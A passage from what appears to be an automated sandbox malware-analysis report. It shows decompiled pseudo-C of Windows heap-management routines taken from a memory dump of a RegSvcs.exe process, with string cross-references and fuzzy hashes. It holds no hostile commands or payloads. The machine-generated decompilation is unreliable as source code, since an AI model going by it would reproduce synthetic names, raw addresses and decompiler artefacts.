                                          										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                          										__eflags = _t216;
                                          										goto L28;
                                          									}
                                          									_t255 = _t182;
                                          									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                          										continue;
                                          									} else {
                                          										goto L28;
                                          									}
                                          								}
                                          								goto L28;
                                          							}
                                          						}
                                          					}
                                          					L39:
                                          				} while (_t235 != 0);
                                          				_t214 = _v12;
                                          				_t131 =  *(_t206 + 0x54) ^ _t214;
                                          				 *(_t256 + 4) = _t131;
                                          				if(_t214 == 0) {
                                          					__eflags =  *0x13e8748 - 1;
                                          					if( *0x13e8748 >= 1) {
                                          						_t127 = _t256 + 0xfff; // 0xfff
                                          						_t131 = _t127 & 0xfffff000;
                                          						__eflags = _t131 - _t256;
                                          						if(_t131 != _t256) {
                                          							_t156 =  *[fs:0x30];
                                          							__eflags =  *(_t156 + 0xc);
                                          							if( *(_t156 + 0xc) == 0) {
                                          								_push("HEAP: ");
                                          								E012FB150();
                                          							} else {
                                          								E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          							}
                                          							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                          							_t131 = E012FB150();
                                          							__eflags =  *0x13e7bc8;
                                          							if(__eflags == 0) {
                                          								_t131 = E013B2073(_t206, 1, _t251, __eflags);
                                          							}
                                          						}
                                          					}
                                          				}
                                          				goto L41;
                                          			}

                                          Strings
                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01362403
                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 013622F3
                                          • HEAP: , xrefs: 013622E6, 013623F6
                                          • HEAP[%wZ]: , xrefs: 013622D7, 013623E7
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                          • API String ID: 0-1657114761
                                          • Opcode ID: 1fbc88fc22691d7f5eed042edf571a498cbe51ff8157bcb8d99793cea13938a0
                                          • Instruction ID: 6ea37f7fd83ef16365d532a720bfb7cb5e84a6ec67bcaf02694fa59db0e0dbd7
                                          • Opcode Fuzzy Hash: 1fbc88fc22691d7f5eed042edf571a498cbe51ff8157bcb8d99793cea13938a0
                                          • Instruction Fuzzy Hash: 84D1E53460128A8FDB19CF6CC4907BABBF6FF48309F158569D95A9B74AE330E841CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 69%
                                          			E0131A229(void* __ecx, void* __edx) {
                                          				signed int _v20;
                                          				char _v24;
                                          				char _v28;
                                          				void* _v44;
                                          				void* _v48;
                                          				void* _v56;
                                          				void* _v60;
                                          				void* __ebx;
                                          				signed int _t55;
                                          				signed int _t57;
                                          				void* _t61;
                                          				intOrPtr _t62;
                                          				void* _t65;
                                          				void* _t71;
                                          				signed char* _t74;
                                          				intOrPtr _t75;
                                          				signed char* _t80;
                                          				intOrPtr _t81;
                                          				void* _t82;
                                          				signed char* _t85;
                                          				signed char _t91;
                                          				void* _t103;
                                          				void* _t105;
                                          				void* _t121;
                                          				void* _t129;
                                          				signed int _t131;
                                          				void* _t133;
                                          
                                          				_t105 = __ecx;
                                          				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                          				_t103 = __edx;
                                          				_t129 = __ecx;
                                          				E0131DF24(__edx,  &_v28, _t133);
                                          				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                          				asm("sbb edi, edi");
                                          				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                          				if(_t55 != 0) {
                                          					_push(0);
                                          					_push(0x14);
                                          					_push( &_v24);
                                          					_push(3);
                                          					_push(_t129);
                                          					_push(0xffffffff);
                                          					_t57 = E01339730();
                                          					__eflags = _t57;
                                          					if(_t57 < 0) {
                                          						L17:
                                          						_push(_t105);
                                          						E013BA80D(_t129, 1, _v20, 0);
                                          						_t121 = 4;
                                          						goto L1;
                                          					}
                                          					__eflags = _v20 & 0x00000060;
                                          					if((_v20 & 0x00000060) == 0) {
                                          						goto L17;
                                          					}
                                          					__eflags = _v24 - _t129;
                                          					if(_v24 == _t129) {
                                          						goto L1;
                                          					}
                                          					goto L17;
                                          				}
                                          				L1:
                                          				_push(_t121);
                                          				_push(0x1000);
                                          				_push(_t133 + 0x14);
                                          				_push(0);
                                          				_push(_t133 + 0x20);
                                          				_push(0xffffffff);
                                          				_t61 = E01339660();
                                          				_t122 = _t61;
                                          				if(_t61 < 0) {
                                          					_t62 =  *[fs:0x30];
                                          					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                          					__eflags =  *(_t62 + 0xc);
                                          					if( *(_t62 + 0xc) == 0) {
                                          						_push("HEAP: ");
                                          						E012FB150();
                                          					} else {
                                          						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					_push( *((intOrPtr*)(_t133 + 0xc)));
                                          					_push( *((intOrPtr*)(_t133 + 0x14)));
                                          					_push(_t129);
                                          					E012FB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                          					_t65 = 0;
                                          					L13:
                                          					return _t65;
                                          				}
                                          				_t71 = E01317D50();
                                          				_t124 = 0x7ffe0380;
                                          				if(_t71 != 0) {
                                          					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				} else {
                                          					_t74 = 0x7ffe0380;
                                          				}
                                          				if( *_t74 != 0) {
                                          					_t75 =  *[fs:0x30];
                                          					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                          					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                          						E013B138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                          					}
                                          				}
                                          				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                          				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                          				if(E01317D50() != 0) {
                                          					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				} else {
                                          					_t80 = _t124;
                                          				}
                                          				if( *_t80 != 0) {
                                          					_t81 =  *[fs:0x30];
                                          					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                          					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                          						__eflags = E01317D50();
                                          						if(__eflags != 0) {
                                          							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          						}
                                          						E013B1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                          					}
                                          				}
                                          				_t82 = E01317D50();
                                          				_t125 = 0x7ffe038a;
                                          				if(_t82 != 0) {
                                          					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          				} else {
                                          					_t85 = 0x7ffe038a;
                                          				}
                                          				if( *_t85 != 0) {
                                          					__eflags = E01317D50();
                                          					if(__eflags != 0) {
                                          						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          					}
                                          					E013B1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                          				}
                                          				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                          				_t91 =  *(_t103 + 2);
                                          				if((_t91 & 0x00000004) != 0) {
                                          					E0134D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                          					_t91 =  *(_t103 + 2);
                                          				}
                                          				 *(_t103 + 2) = _t91 & 0x00000017;
                                          				_t65 = 1;
                                          				goto L13;
                                          			}































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 2994545307-2586055223
                                          • Opcode ID: fc9b2424dcc484a92332ccd42a222caef7966765645269cfb9763c5b014a3d1e
                                          • Instruction ID: b0b151bb6cd211b872b8a42016d09a2ce2cb9debe1183189c310f5f6c9788ac0
                                          • Opcode Fuzzy Hash: fc9b2424dcc484a92332ccd42a222caef7966765645269cfb9763c5b014a3d1e
                                          • Instruction Fuzzy Hash: 475133322056859FE722EB6CC844F777BECFF90B58F084468F9518B696D764D801CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                          • API String ID: 2994545307-336120773
                                          • Opcode ID: 54159773ba8e9591e342aa098d13db3b715042dec472881fc96acce6888dabd3
                                          • Instruction ID: 560a60a1eba4cf6502f1489170544b90fd0dbe88d4638b5d884cee8c0e21ba1e
                                          • Opcode Fuzzy Hash: 54159773ba8e9591e342aa098d13db3b715042dec472881fc96acce6888dabd3
                                          • Instruction Fuzzy Hash: 3B312632610114EFE720DB5DC8C9FA7B7E8EF04628F244069F6069BA92E770A940C75E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 60%
                                          			E013BD616(signed int __ecx, intOrPtr __edx, signed int _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed char _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				unsigned int _v36;
                                          				intOrPtr _v40;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t79;
                                          				signed char _t86;
                                          				signed int _t88;
                                          				void* _t91;
                                          				signed int _t94;
                                          				signed int _t95;
                                          				unsigned int _t96;
                                          				signed int _t110;
                                          				signed char _t118;
                                          				intOrPtr _t120;
                                          				signed int _t123;
                                          				signed int _t124;
                                          				signed char _t131;
                                          				signed int _t133;
                                          				signed int _t137;
                                          				signed char _t147;
                                          				signed int _t153;
                                          				signed int _t159;
                                          				signed int _t160;
                                          				signed int _t161;
                                          				signed int _t164;
                                          				signed int _t169;
                                          				signed int _t173;
                                          
                                          				_v8 =  *0x13ed360 ^ _t173;
                                          				_t120 = __edx;
                                          				_t159 = __ecx;
                                          				_v40 = __edx;
                                          				_t150 =  *(__edx + 1) & 0x000000ff;
                                          				_t174 =  *0x13e610c & 0x00000001;
                                          				_t160 = 0;
                                          				_v24 = 0;
                                          				_v28 =  *(0x12daef0 + ( *(__edx + 1) & 0x000000ff) * 2) & 0x0000ffff;
                                          				if(( *0x13e610c & 0x00000001) == 0) {
                                          					_v12 = 0;
                                          				} else {
                                          					_v12 = E013BC70A(__ecx + 0x38, _t150);
                                          				}
                                          				_t79 = E013BC5FF(_t120, 0, _t174);
                                          				_t153 = _t79 * _v28;
                                          				_v36 = _t153;
                                          				_v32 = (0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2;
                                          				_t86 = E013BA359((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2 + _t153,  *((intOrPtr*)(_t159 + 0x2c)));
                                          				_t131 = _t86;
                                          				_v16 = _t86;
                                          				if(_t131 <= 0xc) {
                                          					_t131 = 0xc;
                                          					_v16 = _t131;
                                          				}
                                          				_t123 = 1 << _t131;
                                          				_v20 = 1;
                                          				if(( *0x13e610c & 0x00000008) == 0) {
                                          					L11:
                                          					_t88 = 1;
                                          					__eflags = 1;
                                          					L12:
                                          					_t133 = _a4 & _t88;
                                          					_v32 = _t133;
                                          					if(_t133 == 0) {
                                          						L0131FAD0(_t159 + 0x34);
                                          					}
                                          					_t134 = _t159 + (_v16 + 0xfffffffc) * 8;
                                          					_t91 = 0;
                                          					if( *((intOrPtr*)(_t159 + (_v16 + 0xfffffffc) * 8 + 4)) == 0) {
                                          						_t124 = 0;
                                          					} else {
                                          						_t124 = E01321710(_t134);
                                          						_t91 = 0;
                                          					}
                                          					if(_t124 != 0) {
                                          						_t94 = 1 <<  *(_t124 + 0x1c);
                                          						__eflags = 1;
                                          						goto L22;
                                          					} else {
                                          						 *0x13eb1e0( *_t159, _v20, _t91, _a4);
                                          						_t124 =  *( *(_t159 + 4) ^  *0x13e6110 ^ _t159)();
                                          						if(_t124 != 0) {
                                          							_t94 = 0;
                                          							_t160 = 0;
                                          							L22:
                                          							__eflags =  *0x13e610c & 0x00000002;
                                          							_v16 = _t94;
                                          							if(( *0x13e610c & 0x00000002) == 0) {
                                          								L25:
                                          								_t95 = E013BD597(_v20, _v28);
                                          								_t156 = _t95;
                                          								_v12 = _t95;
                                          								L26:
                                          								_t96 = _v16;
                                          								__eflags = _t96;
                                          								if(_t96 != 0) {
                                          									__eflags =  *((char*)(_t124 + 0x1d)) - 1;
                                          									if( *((char*)(_t124 + 0x1d)) > 1) {
                                          										_t169 = _t96 >> 0xc;
                                          										__eflags = _t169;
                                          										_t160 =  ~_t169;
                                          										_v24 = _t160;
                                          									}
                                          								}
                                          								__eflags = _t96 - _t156;
                                          								if(_t96 >= _t156) {
                                          									L33:
                                          									_t137 = _v20;
                                          									__eflags = _t156 - _t137;
                                          									if(_t156 != _t137) {
                                          										_t160 = _t160 + (_t156 >> 0xc);
                                          										__eflags = _t160;
                                          									}
                                          									__eflags = _t160;
                                          									if(_t160 != 0) {
                                          										asm("lock xadd [eax], esi");
                                          									}
                                          									_push(_t137);
                                          									_t156 = _t137;
                                          									E013BDEF6(_t124, _t137, _t137, _v28);
                                          									asm("lock inc dword [eax+0x20]");
                                          									asm("lock xadd [eax], ecx");
                                          									_t161 = _t124;
                                          									_t124 = 0;
                                          									__eflags = 0;
                                          									goto L38;
                                          								} else {
                                          									 *0x13eb1e0( *_t159, _t124, _t156);
                                          									_t110 =  *( *(_t159 + 0xc) ^  *0x13e6110 ^ _t159)();
                                          									__eflags = _t110;
                                          									if(_t110 >= 0) {
                                          										_t160 = _v24;
                                          										_t156 = _v12;
                                          										goto L33;
                                          									}
                                          									_t161 = 0;
                                          									L38:
                                          									_v12 = _t161;
                                          									__eflags = _t124;
                                          									if(_t124 != 0) {
                                          										_t164 =  *(_t159 + 8) ^  *0x13e6110 ^ _t159;
                                          										__eflags = _t164;
                                          										 *0x13eb1e0( *_t159, _t124, _v20, _a4);
                                          										 *_t164();
                                          										_t161 = _v12;
                                          									}
                                          									L40:
                                          									if(_v32 == 0) {
                                          										E0131FA00(_t124, _t159 + 0x34, _t159, _t159 + 0x34);
                                          									}
                                          									return E0133B640(_t161, _t124, _v8 ^ _t173, _t156, _t159, _t161);
                                          								}
                                          							}
                                          							__eflags = _v12;
                                          							if(_v12 == 0) {
                                          								goto L25;
                                          							}
                                          							_t156 = _v20;
                                          							_v12 = _t156;
                                          							goto L26;
                                          						}
                                          						_t161 = 0;
                                          						goto L40;
                                          					}
                                          				}
                                          				_t146 = _v36;
                                          				if(_v32 > _v36 >> 6) {
                                          					goto L11;
                                          				}
                                          				_t118 = E013BA359(_t146,  *((intOrPtr*)(_t159 + 0x2c)));
                                          				_t147 = _t118;
                                          				_v16 = _t118;
                                          				if(_t147 <= 0xc) {
                                          					_t147 = 0xc;
                                          					_v16 = _t147;
                                          				}
                                          				_t88 = 1;
                                          				_t156 = 1 << _t147;
                                          				if(_t123 > 1) {
                                          					_v20 = 1;
                                          				}
                                          				goto L12;
                                          			}






































                                          0x00000000
                                          0x013bd7d5
                                          0x013bd7ce
                                          0x013bd818
                                          0x013bd818
                                          0x013bd81b
                                          0x013bd81d
                                          0x013bd831
                                          0x013bd831
                                          0x013bd835
                                          0x013bd83b
                                          0x013bd83d
                                          0x013bd83d
                                          0x013bd840
                                          0x013bd844
                                          0x013bd84a
                                          0x013bd84a
                                          0x013bd861
                                          0x013bd861
                                          0x013bd7af
                                          0x013bd778
                                          0x013bd77c
                                          0x00000000
                                          0x00000000
                                          0x013bd77e
                                          0x013bd781
                                          0x00000000
                                          0x013bd781
                                          0x013bd757
                                          0x00000000
                                          0x013bd757
                                          0x013bd731
                                          0x013bd6c6
                                          0x013bd6d1
                                          0x00000000
                                          0x00000000
                                          0x013bd6d6
                                          0x013bd6db
                                          0x013bd6dd
                                          0x013bd6e3
                                          0x013bd6e7
                                          0x013bd6e8
                                          0x013bd6e8
                                          0x013bd6ed
                                          0x013bd6f0
                                          0x013bd6f4
                                          0x013bd6f6
                                          0x013bd6f6
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 2cc7332feaab6cb2ede34545bdca6590bd9078cb77dc007e6b5d95cc3a5b55b8
                                          • Instruction ID: e15544cc72dab697ad090dd9b027f94841b792dfadd24c50011f958f918a7587
                                          • Opcode Fuzzy Hash: 2cc7332feaab6cb2ede34545bdca6590bd9078cb77dc007e6b5d95cc3a5b55b8
                                          • Instruction Fuzzy Hash: 7881A271E0025A9BCB15DFA9C8816EEBBF5FF48318F148169D615EBA81EB30D911CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E013199BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                                          				char _v5;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed short _v20;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed short _t186;
                                          				intOrPtr _t187;
                                          				signed short _t190;
                                          				signed int _t196;
                                          				signed short _t197;
                                          				intOrPtr _t203;
                                          				signed int _t207;
                                          				signed int _t210;
                                          				signed short _t215;
                                          				intOrPtr _t216;
                                          				signed short _t219;
                                          				signed int _t221;
                                          				signed short _t222;
                                          				intOrPtr _t228;
                                          				signed int _t232;
                                          				signed int _t235;
                                          				signed int _t250;
                                          				signed short _t251;
                                          				intOrPtr _t252;
                                          				signed short _t254;
                                          				intOrPtr _t255;
                                          				signed int _t258;
                                          				signed int _t259;
                                          				signed short _t262;
                                          				intOrPtr _t271;
                                          				signed int _t279;
                                          				signed int _t282;
                                          				signed int _t284;
                                          				signed int _t286;
                                          				intOrPtr _t292;
                                          				signed int _t296;
                                          				signed int _t299;
                                          				signed int _t307;
                                          				signed int* _t309;
                                          				signed short* _t311;
                                          				signed short* _t313;
                                          				signed char _t314;
                                          				intOrPtr _t316;
                                          				signed int _t323;
                                          				signed char _t328;
                                          				signed short* _t330;
                                          				signed char _t331;
                                          				intOrPtr _t335;
                                          				signed int _t342;
                                          				signed char _t347;
                                          				signed short* _t348;
                                          				signed short* _t350;
                                          				signed short _t352;
                                          				signed char _t354;
                                          				intOrPtr _t357;
                                          				intOrPtr* _t364;
                                          				signed char _t365;
                                          				intOrPtr _t366;
                                          				signed int _t373;
                                          				signed char _t378;
                                          				signed int* _t381;
                                          				signed int _t382;
                                          				signed short _t384;
                                          				signed int _t386;
                                          				unsigned int _t390;
                                          				signed int _t393;
                                          				signed int* _t394;
                                          				unsigned int _t398;
                                          				signed short _t400;
                                          				signed short _t402;
                                          				signed int _t404;
                                          				signed int _t407;
                                          				unsigned int _t411;
                                          				signed short* _t414;
                                          				signed int _t415;
                                          				signed short* _t419;
                                          				signed int* _t420;
                                          				void* _t421;
                                          
                                          				_t414 = __edx;
                                          				_t307 = __ecx;
                                          				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
                                          				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
                                          					_v5 = _a8;
                                          					L3:
                                          					_t381 = _a4;
                                          					goto L4;
                                          				} else {
                                          					__eflags =  *(__ecx + 0x4c);
                                          					if( *(__ecx + 0x4c) != 0) {
                                          						_t411 =  *(__ecx + 0x50) ^  *_t419;
                                          						 *_t419 = _t411;
                                          						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                                          						__eflags = _t411 >> 0x18 - _t378;
                                          						if(__eflags != 0) {
                                          							_push(_t378);
                                          							E013AFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                                          						}
                                          					}
                                          					_t250 = _a8;
                                          					_v5 = _t250;
                                          					__eflags = _t250;
                                          					if(_t250 != 0) {
                                          						_t400 = _t414[6];
                                          						_t53 =  &(_t414[4]); // -16
                                          						_t348 = _t53;
                                          						_t251 =  *_t348;
                                          						_v12 = _t251;
                                          						_v16 = _t400;
                                          						_t252 =  *((intOrPtr*)(_t251 + 4));
                                          						__eflags =  *_t400 - _t252;
                                          						if( *_t400 != _t252) {
                                          							L49:
                                          							_push(_t348);
                                          							_push( *_t400);
                                          							E013BA80D(_t307, 0xd, _t348, _t252);
                                          							L50:
                                          							_v5 = 0;
                                          							goto L11;
                                          						}
                                          						__eflags =  *_t400 - _t348;
                                          						if( *_t400 != _t348) {
                                          							goto L49;
                                          						}
                                          						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                          						_t407 =  *(_t307 + 0xb4);
                                          						__eflags = _t407;
                                          						if(_t407 == 0) {
                                          							L36:
                                          							_t364 = _v16;
                                          							_t282 = _v12;
                                          							 *_t364 = _t282;
                                          							 *((intOrPtr*)(_t282 + 4)) = _t364;
                                          							__eflags = _t414[1] & 0x00000008;
                                          							if((_t414[1] & 0x00000008) == 0) {
                                          								L39:
                                          								_t365 = _t414[1];
                                          								__eflags = _t365 & 0x00000004;
                                          								if((_t365 & 0x00000004) != 0) {
                                          									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                          									_v12 = _t284;
                                          									__eflags = _t365 & 0x00000002;
                                          									if((_t365 & 0x00000002) != 0) {
                                          										__eflags = _t284 - 4;
                                          										if(_t284 > 4) {
                                          											_t284 = _t284 - 4;
                                          											__eflags = _t284;
                                          											_v12 = _t284;
                                          										}
                                          									}
                                          									_t78 =  &(_t414[8]); // -8
                                          									_t286 = E0134D540(_t78, _t284, 0xfeeefeee);
                                          									_v16 = _t286;
                                          									__eflags = _t286 - _v12;
                                          									if(_t286 != _v12) {
                                          										_t366 =  *[fs:0x30];
                                          										__eflags =  *(_t366 + 0xc);
                                          										if( *(_t366 + 0xc) == 0) {
                                          											_push("HEAP: ");
                                          											E012FB150();
                                          										} else {
                                          											E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          										}
                                          										_push(_v16 + 0x10 + _t414);
                                          										E012FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                          										_t292 =  *[fs:0x30];
                                          										_t421 = _t421 + 0xc;
                                          										__eflags =  *((char*)(_t292 + 2));
                                          										if( *((char*)(_t292 + 2)) != 0) {
                                          											 *0x13e6378 = 1;
                                          											asm("int3");
                                          											 *0x13e6378 = 0;
                                          										}
                                          									}
                                          								}
                                          								goto L50;
                                          							}
                                          							_t296 = E0131A229(_t307, _t414);
                                          							__eflags = _t296;
                                          							if(_t296 != 0) {
                                          								goto L39;
                                          							} else {
                                          								E0131A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                          								goto L50;
                                          							}
                                          						} else {
                                          							_t373 =  *_t414 & 0x0000ffff;
                                          							while(1) {
                                          								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
                                          								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                                          									_t301 = _t373;
                                          									break;
                                          								}
                                          								_t299 =  *_t407;
                                          								__eflags = _t299;
                                          								if(_t299 == 0) {
                                          									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                                          									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                                          									break;
                                          								} else {
                                          									_t407 = _t299;
                                          									continue;
                                          								}
                                          							}
                                          							_t62 =  &(_t414[4]); // -16
                                          							E0131BC04(_t307, _t407, 1, _t62, _t301, _t373);
                                          							goto L36;
                                          						}
                                          					}
                                          					L11:
                                          					_t402 = _t419[6];
                                          					_t25 =  &(_t419[4]); // -16
                                          					_t350 = _t25;
                                          					_t254 =  *_t350;
                                          					_v12 = _t254;
                                          					_v20 = _t402;
                                          					_t255 =  *((intOrPtr*)(_t254 + 4));
                                          					__eflags =  *_t402 - _t255;
                                          					if( *_t402 != _t255) {
                                          						L61:
                                          						_push(_t350);
                                          						_push( *_t402);
                                          						E013BA80D(_t307, 0xd, _t350, _t255);
                                          						goto L3;
                                          					}
                                          					__eflags =  *_t402 - _t350;
                                          					if( *_t402 != _t350) {
                                          						goto L61;
                                          					}
                                          					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                                          					_t404 =  *(_t307 + 0xb4);
                                          					__eflags = _t404;
                                          					if(_t404 == 0) {
                                          						L20:
                                          						_t352 = _v20;
                                          						_t258 = _v12;
                                          						 *_t352 = _t258;
                                          						 *(_t258 + 4) = _t352;
                                          						__eflags = _t419[1] & 0x00000008;
                                          						if((_t419[1] & 0x00000008) != 0) {
                                          							_t259 = E0131A229(_t307, _t419);
                                          							__eflags = _t259;
                                          							if(_t259 != 0) {
                                          								goto L21;
                                          							} else {
                                          								E0131A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                                          								goto L3;
                                          							}
                                          						}
                                          						L21:
                                          						_t354 = _t419[1];
                                          						__eflags = _t354 & 0x00000004;
                                          						if((_t354 & 0x00000004) != 0) {
                                          							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                                          							__eflags = _t354 & 0x00000002;
                                          							if((_t354 & 0x00000002) != 0) {
                                          								__eflags = _t415 - 4;
                                          								if(_t415 > 4) {
                                          									_t415 = _t415 - 4;
                                          									__eflags = _t415;
                                          								}
                                          							}
                                          							_t91 =  &(_t419[8]); // -8
                                          							_t262 = E0134D540(_t91, _t415, 0xfeeefeee);
                                          							_v20 = _t262;
                                          							__eflags = _t262 - _t415;
                                          							if(_t262 != _t415) {
                                          								_t357 =  *[fs:0x30];
                                          								__eflags =  *(_t357 + 0xc);
                                          								if( *(_t357 + 0xc) == 0) {
                                          									_push("HEAP: ");
                                          									E012FB150();
                                          								} else {
                                          									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          								}
                                          								_push(_v20 + 0x10 + _t419);
